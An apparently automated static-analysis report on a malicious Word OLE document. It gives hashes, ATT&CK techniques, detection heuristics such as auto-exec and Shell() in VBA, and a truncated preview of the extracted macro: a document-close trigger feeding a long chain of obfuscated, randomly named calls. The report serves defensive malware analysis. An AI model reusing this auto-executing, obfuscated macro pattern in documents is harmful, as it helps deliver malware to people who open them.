Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8c9873e9ce65756…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 556.5 KB
Created: 2017-06-19 19:49:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: f75ba0ad809d621bb7018cf843fac0a3
SHA-1: eb2201736d58c2fd35105b2e6f9068d25975efb6
SHA-256: c8c9873e9ce65756fe14755535b1ddf4e66956fa6739461071f7cf8d67873cc2
Risk Score: 150

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

This OLE document contains VBA macros that trigger on an auto-open event and use the Shell() function. Taken together, the Shell() call and the auto-execution marker strongly suggest the macro is designed to execute arbitrary code, most likely to download and run a second-stage payload. The obfuscated VBA code prevents a more detailed analysis of its specific actions.

Heuristics (6)

  • VBA macros detected [severity: medium] [3 related findings] [rule: OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [severity: critical] [rule: OLE_VBA_SHELL]
    Shell() call in VBA
  • VBA p-code auto-exec with execution tokens [severity: high] [rule: OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) [severity: low] [rule: OLE_VBA_ENVIRON]
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker [severity: medium] [rule: OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [severity: info] [rule: EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 401678 bytes
SHA-256: b9c3b42482dd2b3735c7cb3a7a97600ac2c5f10a171655ba5c7e19a3c37c07f5

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub doCUment_CLOse(): Call EVFVWOXONNLR: End Sub
Sub EVFVWOXONNLR()
Call YWQIDHKZJGYI
End Sub
Private Function YWQIDHKZJGYI() As Double
Call VIGLUXFWTSGT
End Function
Sub VIGLUXFWTSGT()
Call XTQZGHSZWVBH
End Sub
Sub XTQZGHSZWVBH()
Call WJKQGVNDOUHD
End Sub
Static Sub WJKQGVNDOUHD()
Call CMZMWCSRFMSN
End Sub
Static Sub CMZMWCSRFMSN()
Call EYFDTNQNZYJS
End Sub
Private Function EYFDTNQNZYJS() As Currency
Call DFRLGBPLDCAZ
End Function
Private Function DFRLGBPLDCAZ() As Byte
Call QQYYECGEKBPO
End Function
Sub QQYYECGEKBPO()
Call JUREEWEWWTWR
End Sub
Function JUREEWEWWTWR() As Long
Call WQSSVWQKQEAR
End Function
Function WQSSVWQKQEAR() As Currency
Call RUFRLOBBUIMR
End Function
Function RUFRLOBBUIMR() As Boolean
Call YJFKWTBCGHMA
End Function
Static Function YJFKWTBCGHMA() As Date
Call EPCZEARYMYRX
End Function
Static Function EPCZEARYMYRX() As Variant
Call OAOTNDUSCKBP
End Function
Private Function OAOTNDUSCKBP() As Object
Call GBELEZSDFQKI
End Function
Private Function GBELEZSDFQKI() As Variant
Call IVVJCJANXOVL
End Function
Function IVVJCJANXOVL() As Object
Call USSAFLXTJGUB
End Function
Private Function USSAFLXTJGUB() As Currency
Call QNYQICOEYRRN
End Function
Static Function QNYQICOEYRRN() As Boolean
Call KVUJPULDRVYB
End Function
Function KVUJPULDRVYB() As Variant
Call BJAELRPCYURW
End Function
Static Function BJAELRPCYURW() As Byte
Call ZIAFYGEMFMOG
End Function
Sub ZIAFYGEMFMOG()
Call ZDXJGTYWEXUM
End Sub
Private Function ZDXJGTYWEXUM() As Variant
Call QHVUQPHOXCXT
End Function
Static Sub QHVUQPHOXCXT()
Call UPOMKXIDVCYH
End Sub
Function UPOMKXIDVCYH() As Boolean
Call MBXFVTCJLSVM
End Function
Private Function MBXFVTCJLSVM() As Byte
Call KKFPUIMZGFIK
End Function
Static Sub KKFPUIMZGFIK()
Call XLFTFIIMZKHK
End Sub
Private Sub XLFTFIIMZKHK()
Call DIVYBPDBRHWT
End Sub
Static Sub DIVYBPDBRHWT()
Call AMESGEESMZNQ
End Sub
Function AMESGEESMZNQ() As Long
Call JFGYAICAHKMJ
End Function
Private Sub JFGYAICAHKMJ()
Call TDIVNMLHAPHC
End Sub
Static Sub TDIVNMLHAPHC()
Call NULYHFDMIOEE
End Sub
Function NULYHFDMIOEE() As Currency
Call XAYBWHVGYFTV
End Function
Function XAYBWHVGYFTV() As Currency
Call KSRVVHWNDQCH
End Function
Function KSRVVHWNDQCH() As Double
Call QMULKPROWXSU
End Function
Sub QMULKPROWXSU()
Call FIQSRMSBJUAQ
End Sub
Static Function FIQSRMSBJUAQ() As String
Call VFCXAKRGFNKZ
End Function
Static Sub VFCXAKRGFNKZ()
Call NXLGEFVLUYCF
End Sub
Static Sub NXLGEFVLUYCF()
Call VZVWKJOZDDRL
End Sub
Static Function VZVWKJOZDDRL() As Object
Call FZIJFMXUUAKC
End Function
Function FZIJFMXUUAKC() As Long
Call IYZXXWODLSRF
End Function
Private Function IYZXXWODLSRF() As Boolean
Call EPXUHNVHLETE
End Function
Sub EPXUHNVHLETE()
Call JNJCOVBPUJED
End Sub
Sub JNJCOVBPUJED()
Call HILMHKGABHFM
End Sub
Static Sub HILMHKGABHFM()
Call WJFLIIQMMZJJ
End Sub
Static Function WJFLIIQMMZJJ() As Double
Call XZUVYUZPXLVC
End Function
Private Sub XZUVYUZPXLVC()
Call FFMFWZDKVPEW
End Sub
Static Function FFMFWZDKVPEW() As Currency
Call RTBMNAFKSOOY
End Function
Function RTBMNAFKSOOY() As Integer
Call TWATXLIAYGPO
End Function
Private Function TWATXLIAYGPO() As Date
Call YMESTTTCTRKA
End Function
Sub YMESTTTCTRKA()
Call DOYUTCKRRWQN
End Sub
Function DOYUTCKRRWQN() As Currency
Call JHGGXIUZTUKJ
End Function
Static Function JHGGXIUZTUKJ() As Single
Call YMJYQGPTUMIU
End Function
Static Sub YMJYQGPTUMIU()
Call IBDLRKDTZXNZ
End Sub
Private Function IBDLRKDTZXNZ() As Double
Call IBZFTWHDYDPF
End Function
Static Sub IBZFTWHDYDPF()
Call KYYXKHZTFAUV
End Sub
Function KYYXKHZTFAUV() As Object
Call EVBQYABXLTNY
End Function
Function EVBQYABXLTNY() As Date
Call SJLRFZRXBFBW
End Function
Sta
... (truncated)